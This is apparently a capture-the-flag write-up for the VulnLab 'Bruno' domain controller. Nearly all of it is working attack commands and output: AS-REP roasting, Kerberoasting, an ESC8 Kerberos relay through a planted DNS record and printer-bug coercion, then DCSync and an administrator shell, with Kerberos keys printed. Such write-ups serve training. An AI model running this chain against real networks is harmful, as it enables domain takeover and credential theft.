VulnLab Bruno
VulnLab Bruno
VulnLab Bruno
Bruno
Recon
1
2
3
└─$ rustscan -a 10.10.81.38 -r 1-65535 -g
10.10.81.38 -> [21,53,80,88,135,139,389,443,445,464,593,636,3268,3269,3389,5357,5985,9389,49664,49667,49668,49682,49683,51136,51155,51263]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
└─$ nmap -sC -sV -p21,53,80,88,135,139,389,443,445,464,593,636,3268,3269,3389,5357,5985,9389,49664,49667,49668,49682,49683,51136,51155,51263 10.10.81.38
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-22 21:53 +06
Nmap scan report for 10.10.81.38
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
21/tcp open tcpwrapped
53/tcp open tcpwrapped
80/tcp open tcpwrapped
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open tcpwrapped
135/tcp open tcpwrapped
139/tcp open tcpwrapped
389/tcp filtered ldap
443/tcp open tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA
| Not valid before: 2022-06-29T13:23:01
|_Not valid after: 2121-06-29T13:33:00
| tls-alpn:
|_ http/1.1
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
445/tcp open tcpwrapped
464/tcp filtered kpasswd5
593/tcp filtered http-rpc-epmap
636/tcp filtered ldapssl
3268/tcp filtered globalcatLDAP
3269/tcp filtered globalcatLDAPssl
3389/tcp open tcpwrapped
| rdp-ntlm-info:
| Target_Name: BRUNO
| NetBIOS_Domain_Name: BRUNO
| NetBIOS_Computer_Name: BRUNODC
| DNS_Domain_Name: bruno.vl
| DNS_Computer_Name: brunodc.bruno.vl
| DNS_Tree_Name: bruno.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-05-22T15:52:08+00:00
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Not valid before: 2025-05-21T15:37:34
|_Not valid after: 2025-11-20T15:37:34
|_ssl-date: 2025-05-22T15:52:41+00:00; -1m31s from scanner time.
5357/tcp filtered wsdapi
5985/tcp open tcpwrapped
9389/tcp open tcpwrapped
49664/tcp filtered unknown
49667/tcp filtered unknown
49668/tcp filtered unknown
49682/tcp filtered unknown
49683/tcp filtered unknown
51136/tcp filtered unknown
51155/tcp filtered unknown
51263/tcp filtered unknown
Host script results:
| smb2-time:
| date: 2025-05-22T15:52:05
|_ start_date: N/A
|_clock-skew: mean: -1m30s, deviation: 0s, median: -1m31s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.91 seconds
1
2
3
4
└─$ nxc smb 10.10.81.38 -u 'Guest' -p ''
SMB 10.10.81.38 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.81.38 445 BRUNODC [-] bruno.vl\Guest: STATUS_ACCOUNT_DISABLED
Anonymous login ftp is enabled
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ ftp anonymous@10.10.81.38
Connected to 10.10.81.38.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> cd app
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||52157|)
150 Opening ASCII mode data connection.
06-29-22 05:42PM 165 changelog
06-28-22 07:15PM 431 SampleScanner.deps.json
06-29-22 03:58PM 7168 SampleScanner.dll
06-29-22 03:58PM 174592 SampleScanner.exe
06-28-22 07:15PM 170 SampleScanner.runtimeconfig.dev.json
06-28-22 07:15PM 154 SampleScanner.runtimeconfig.json
226 Transfer complete.
ftp>
User
Inside the we find changelog file that contain username svc_scan
1
2
3
4
5
6
7
8
9
10
ftp> more changelog
Version 0.3
- integrated with dev site
- automation using svc_scan
Version 0.2
- additional functionality
Version 0.1
- initial support for EICAR string
Let’s
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ kerbrute userenum -d bruno.vl users.txt --dc brunodc.bruno.vl
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 05/22/25 - Ronnie Flathers @ropnop
2025/05/22 22:13:15 > Using KDC(s):
2025/05/22 22:13:15 > brunodc.bruno.vl:88
2025/05/22 22:13:15 > [+] VALID USERNAME: svc_scan@bruno.vl
2025/05/22 22:13:15 > Done! Tested 1 usernames (1 valid) in 0.291 seconds
We see that user is valid. Let’s try AS-REP Roasting
1
2
3
4
5
6
└─$ GetNPUsers.py -usersfile users.txt -outputfile hash -request -format hashcat -dc-ip 10.10.81.38 bruno.vl/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
/home/kali/.local/bin/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$svc_scan@BRUNO.VL:4fb4b8bed2e653876c768636228de20d$78cf20e11d26d3f4fe1f41cd6904347daa43bb1ec103f7d76d11157a90a4cddcaf8d65d0385422440718f5fc39cc24a7ba438921c29762392c32044ffe68ffcf23d1263d0d3c56e97156143466ecccc1e1b29038f70525912ef7d21368370184265fcb6439457614af48637ecdfd969590f226c7f9df748fc992a24020ed501d68d8cf607318cde7df4700fe3662db4f17e1bd4c6f7dbc4c6c7bbdbad1f5fc8a2948e30b46ead8bf0dd49d91ba95b2c73b2dbbbf1d01a766cfe059b1e14b34f8babdbe850250a7e1e8a25ac4f5565c2bf3390cedaed9c6cecdf151ab4a11049ad080b586
The hash is crackable
1
2
3
4
5
└─$ hashcat -m 18200 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
$krb5asrep$23$svc_scan@BRUNO.VL:4fb4b8bed2e653876c768636228de20d$78cf20e11d26d3f4fe1f41cd6904347daa43bb1ec103f7d76d11157a90a4cddcaf8d65d0385422440718f5fc39cc24a7ba438921c29762392c32044ffe68ffcf23d1263d0d3c56e97156143466ecccc1e1b29038f70525912ef7d21368370184265fcb6439457614af48637ecdfd969590f226c7f9df748fc992a24020ed501d68d8cf607318cde7df4700fe3662db4f17e1bd4c6f7dbc4c6c7bbdbad1f5fc8a2948e30b46ead8bf0dd49d91ba95b2c73b2dbbbf1d01a766cfe059b1e14b34f8babdbe850250a7e1e8a25ac4f5565c2bf3390cedaed9c6cecdf151ab4a11049ad080b586:<REDACTED>
Run bloodhound to capture domain data using acquired credentials
1
└─$ bloodhound-ce-python -d 'bruno.vl' -u 'svc_scan' -p '<REDACTED>' -c all -ns 10.10.81.38 --zip --dns-tcp --dns-timeout 60 -v
We can also try Kerberoasting
1
2
3
4
5
6
7
8
9
└─$ GetUserSPNs.py 'bruno.vl/svc_scan':'<REDACTED>' -dc-ip 10.10.81.38 -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------- -------- -------- -------------------------- -------------------------- ----------
NET/brunodc.bruno.vl svc_net 2022-06-29 19:35:45.023707 2022-06-29 22:29:25.394301
SCAN/brunodc.bruno.vl svc_scan 2022-06-29 19:36:15.210348 2025-05-22 22:30:54.739587
<SNIP>
The hash for svc_net is also crackable
1
2
3
4
└─$ hashcat -m 13100 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
$krb5tgs$23$*svc_net$BRUNO.VL$bruno.vl/svc_net*$68b7d03c0476045bda2d41c852e49101$f4238f527711e5843b8ea1a26837365a0fd65caa38532909e3744dd735816a8423d817ad45df54621b5999f1920cc70abe0300d408b88fe42581c4abad9338561c1ad72bea35bddcea22bb848d00e11df15653064dd41f741234cfc88138ef9541671b822e11a16839f616a2ee20b3217a27135e243f06e868c95c737399300d7a55b7f86b6b26aed89575102ec66055bd70a5974f69ab896f486cb31634fdd6f1bbd6a407c0e426e8300a636ff1e8f147f83245c1895132f1395c118596496ba3d847f6ca50358af32e9c0a0c9e1679eccf0e1af3a1e844704609d77f36f9ccdaebb5b990aa0fb9d49a79f8a9732d2e8ad91149908c921fd6201f1df4a96af560a0a791b5fc979c3413738597c98f48d70a022b511581ed93f1e5e5915b1fdecd8ed87d516938c6713b32d7ee89764c2f61bba0b8572fc7ff32f3a00d6bb6ed39b0d6b7ee2902de4e07aaf97b95207d12a5ea791b9eae49e283404df4d7f8144c5f15172e2b1e82bff7f32dfbd8aa7d61b227009a9589ca7e8fb471fcba7552c43f74d951fbcecec96cf3628d12dab7a6ada5f869c34f244b4eb981ec191469434b22512b8bc7b55a8637042eb77785b0b276ff161360caf932880e06b350d0d7cde8d12de744c0f6b78fee7106ca5c84845659b56e2ef9e86834b4b195fe207e318675ec2b04d5e1805131a715bc37c0b2bf88f840f9a6537654eb0eced4564d027adda82ad7d6b81383102b6ea904c845b1fbfba41e36c04b9ca6bc33333f1d6f083ae055d4bc77cdeb80960774681e84ed012ad0ecdb750feb0a695efb2cd3247e119d4ec037429b04804bc03c65e1990c05433f09315e00115335fb722827c3b8553900f06addeb23592c650269ecef48102c28de27fa9b10a68b3cee7568d1b32c4dd7633b7ca3ccecb638e35e5cee7ea33d168e4b9d2076340925060f1f5cb8dec50e4e9e57c7165d026e28c5c52c01f63fb8a9bf5987800f791eeb1247917ed039cafddf03edd53136e05c53804e4f171607649d23085d998c79d3242137d268dcb6ab0a960f6cca62f88ddfca58869d177639e991777ad0435e922c3c4eafc1d8b497fae89b23b926960ca963bd73846af52f2687f24949b33367f987bf4f59ac90b2766ad0f2e2bfaf6828b4167f4e1a07406f4566a89667dd62dc59cebd8a3d005e9cab8d3185a8e82b1325af9619e2185abf2241885a345d0863c5eb21b0609fc93152f02984e8ce0e78156d12363865491033b0bcf0af521c4461700e7e53d6ea554138aa6400d0b99a64b4482146d6b4131690531d203d2bdbf76de0ae5c21f7f9797af38abfc8cbd2f9509dd965864062c19899c2cf92de65f3a84705299b3398bf8a89442e2cfb9265011b53b09c3195faaba0ff610cd9529d6662453b20a4b5e8beec6ca5eb170d8e:<SNIP>
svc_scan has write permissions in queue share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ nxc smb 10.10.81.38 -u 'svc_scan' -p '<REDACTED>' --shares
SMB 10.10.81.38 445 BRUNODC [*] Windows Server 2022 Build 20348 x64 (name:BRUNODC) (domain:bruno.vl) (signing:True) (SMBv1:False)
SMB 10.10.81.38 445 BRUNODC [+] bruno.vl\svc_scan:<REDACTED>
SMB 10.10.81.38 445 BRUNODC [*] Enumerated shares
SMB 10.10.81.38 445 BRUNODC Share Permissions Remark
SMB 10.10.81.38 445 BRUNODC ----- ----------- ------
SMB 10.10.81.38 445 BRUNODC ADMIN$ Remote Admin
SMB 10.10.81.38 445 BRUNODC C$ Default share
SMB 10.10.81.38 445 BRUNODC CertEnroll READ Active Directory Certificate Services share
SMB 10.10.81.38 445 BRUNODC IPC$ READ Remote IPC
SMB 10.10.81.38 445 BRUNODC NETLOGON READ Logon server share
SMB 10.10.81.38 445 BRUNODC queue READ,WRITE
SMB 10.10.81.38 445 BRUNODC SYSVOL READ Logon server share
In my case, the box was solved unintenday way. There’s a intended method to get a user (Reverse engineer the SampleScanner.exe and DLL-Hijacking using write permissions on share) and root (Shadow Credentials/RBCD attack using KrbRelayUp). To check intended solutions please check the following blogs:
- https://notes.secure77.de/WriteUps/VulnLab/Bruno/Writeup
- https://medium.com/@Vendetta0/vulnlab-bruno-4df7d80247b0
- https://arz101.medium.com/vulnlab-bruno-f0129f60ac40
- https://www.puckiestyle.nl/vulnlab-bruno/
Root (Unintended way)
There’s adcs installed
1
2
3
4
5
6
7
└─$ nxc ldap 10.10.81.38 -u 'svc_scan' -p '<REDACTED>' -M adcs
LDAP 10.10.81.38 389 BRUNODC [*] Windows Server 2022 Build 20348 (name:BRUNODC) (domain:bruno.vl)
LDAP 10.10.81.38 389 BRUNODC [+] bruno.vl\svc_scan:<REDACTED>
ADCS 10.10.81.38 389 BRUNODC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.81.38 389 BRUNODC Found PKI Enrollment Server: brunodc.bruno.vl
ADCS 10.10.81.38 389 BRUNODC Found CN: bruno-BRUNODC-CA
ADCS 10.10.81.38 389 BRUNODC Found PKI Enrollment WebService: https://brunodc.bruno.vl/bruno-BRUNODC-CA_CES_Kerberos/service.svc/CES
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
└─$ certipy find -u 'svc_scan@bruno.vl' -p '<REDACTED>' -ns 10.10.81.38 -dc-ip 10.10.81.38 -stdout -dns-tcp -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'bruno-BRUNODC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'bruno-BRUNODC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'bruno-BRUNODC-CA' via RRP
[*] Got CA configuration for 'bruno-BRUNODC-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : bruno-BRUNODC-CA
DNS Name : brunodc.bruno.vl
Certificate Subject : CN=bruno-BRUNODC-CA, DC=bruno, DC=vl
Certificate Serial Number : 52D11B2B5CC276A54DE5B77F5E125E8D
Certificate Validity Start : 2022-06-29 13:23:01+00:00
Certificate Validity End : 2121-06-29 13:33:00+00:00
Web Enrollment : Enabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : BRUNO.VL\Administrators
Access Rights
ManageCertificates : BRUNO.VL\Administrators
BRUNO.VL\Domain Admins
BRUNO.VL\Enterprise Admins
ManageCa : BRUNO.VL\Administrators
BRUNO.VL\Domain Admins
BRUNO.VL\Enterprise Admins
Enroll : BRUNO.VL\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates : [!] Could not find any certificate templates
After seeing ESC8, I tried multiple NTLM relay methods but no success. Eventually, I managed to root the box using Kerberos relay.
The methodology is identical to Cicada box
1
2
3
4
5
└─$ nxc ldap 10.10.81.38 -u 'svc_scan' -p '<REDACTED>' -M maq
LDAP 10.10.81.38 389 BRUNODC [*] Windows Server 2022 Build 20348 (name:BRUNODC) (domain:bruno.vl)
LDAP 10.10.81.38 389 BRUNODC [+] bruno.vl\svc_scan:<REDACTED>
MAQ 10.10.81.38 389 BRUNODC [*] Getting the MachineAccountQuota
MAQ 10.10.81.38 389 BRUNODC MachineAccountQuota: 10
The blogs that are used to perform kerberos relay:
- https://www.synacktiv.com/en/publications/relaying-kerberos-over-smb-using-krbrelayx
- https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html
Create A record pointing to our box, which has to have the form described in blogs. Knowing that by default all authenticated users can create A record if it doesn’t exist, we can abuse that:
1
2
└─$ bloodyAD --host 10.10.81.38 -u 'svc_scan' -p '<REDACTED>' -d 'bruno.vl' add dnsRecord 'brunodc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.4.147
[+] brunodc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA has been successfully added
Make sure to pull latest update for krbrelayx and start it before coercing. Then coerce the box using printerbug
1
2
3
4
5
6
7
8
└─$ printerbug.py bruno.vl/svc_scan:<REDACTED>@10.10.81.38 'brunodc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA'
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at 10.10.81.38
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─$ krbrelayx.py -t 'http://brunodc.bruno.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'brunodc$'
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.81.38
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.10.81.38
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.81.38
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] GOT CERTIFICATE! ID 5
[*] Writing PKCS#12 certificate to ./brunodc$.pfx
[*] Certificate successfully written to file
We got the certificate, now we can pass the certificate and get the NTLM hash for DC
1
2
3
4
5
6
7
8
9
└─$ certipy auth -pfx 'brunodc$.pfx' -dc-ip 10.10.81.38 -username 'brunodc$' -domain 'bruno.vl'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: brunodc$@bruno.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'brunodc.ccache'
[*] Trying to retrieve NT hash for 'brunodc$'
[*] Got hash for 'brunodc$@bruno.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>
Perform DCSync and get Administrator’s hash
1
2
3
4
5
6
7
8
9
10
11
12
└─$ secretsdump.py 'bruno.vl/brunodc$'@brunodc.bruno.vl -hashes ':<REDACTED>' -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8366d22e99c4e2f9b5c9a8bbf5b1b9ea6fd097f622048a3fdb29e95ca69d686f
Administrator:aes128-cts-hmac-sha1-96:882ed3f25c43d2e0519951e837a885d3
Administrator:des-cbc-md5:3e16a497806115b3
[*] Cleaning up...
Connect to the box and get the flag
1
2
3
4
5
6
7
8
9
10
11
└─$ evil-winrm -i 10.10.81.38 -u administrator -H '<REDACTED>'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
https://api.vulnlab.com/api/v1/share?id=31bdaeec-0f8e-423c-9dec-eb3692477eed
This post is licensed under CC BY 4.0 by the author.